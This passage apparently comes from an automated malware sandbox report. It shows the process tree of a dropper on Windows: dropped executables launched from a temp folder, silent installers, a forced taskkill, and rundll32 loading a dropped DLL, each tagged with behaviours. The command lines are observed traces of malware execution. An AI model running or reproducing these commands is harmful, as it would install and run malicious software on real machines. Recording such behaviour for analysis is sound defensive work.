C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Thu1653d94a8da.exe"8⤵
- Kills process with taskkill
PID:3156
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16f3de88a335950bb.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Users\Admin\AppData\Local\Temp\7zS89C8F254\Thu16f3de88a335950bb.exeThu16f3de88a335950bb.exe5⤵
- Executes dropped EXE
PID:4080 -
C:\Users\Admin\AppData\Local\Temp\is-TGGB3.tmp\Thu16f3de88a335950bb.tmp"C:\Users\Admin\AppData\Local\Temp\is-TGGB3.tmp\Thu16f3de88a335950bb.tmp" /SL5="$50058,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zS89C8F254\Thu16f3de88a335950bb.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1568 -
C:\Users\Admin\AppData\Local\Temp\7zS89C8F254\Thu16f3de88a335950bb.exe"C:\Users\Admin\AppData\Local\Temp\7zS89C8F254\Thu16f3de88a335950bb.exe" /SILENT7⤵
- Executes dropped EXE
PID:1640 -
C:\Users\Admin\AppData\Local\Temp\is-R1DBC.tmp\Thu16f3de88a335950bb.tmp"C:\Users\Admin\AppData\Local\Temp\is-R1DBC.tmp\Thu16f3de88a335950bb.tmp" /SL5="$301F0,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zS89C8F254\Thu16f3de88a335950bb.exe" /SILENT8⤵PID:3812
-
C:\Users\Admin\AppData\Local\Temp\is-3LE5J.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-3LE5J.tmp\postback.exe" ss19⤵PID:4764
-
-
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss19⤵PID:4780
-
-
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart9⤵PID:4804
-
C:\db0ebc0db9a5918d7b0944f2\Setup.exeC:\db0ebc0db9a5918d7b0944f2\\Setup.exe /q /norestart /x86 /x64 /web10⤵PID:4128
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16466b26f8b7.exe4⤵PID:2968
-
C:\Users\Admin\AppData\Local\Temp\7zS89C8F254\Thu16466b26f8b7.exeThu16466b26f8b7.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:2244
-
-
-
-
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵PID:2292
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4060
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:1512
-
C:\Users\Admin\AppData\Roaming\iegcsvrC:\Users\Admin\AppData\Roaming\iegcsvr1⤵PID:6124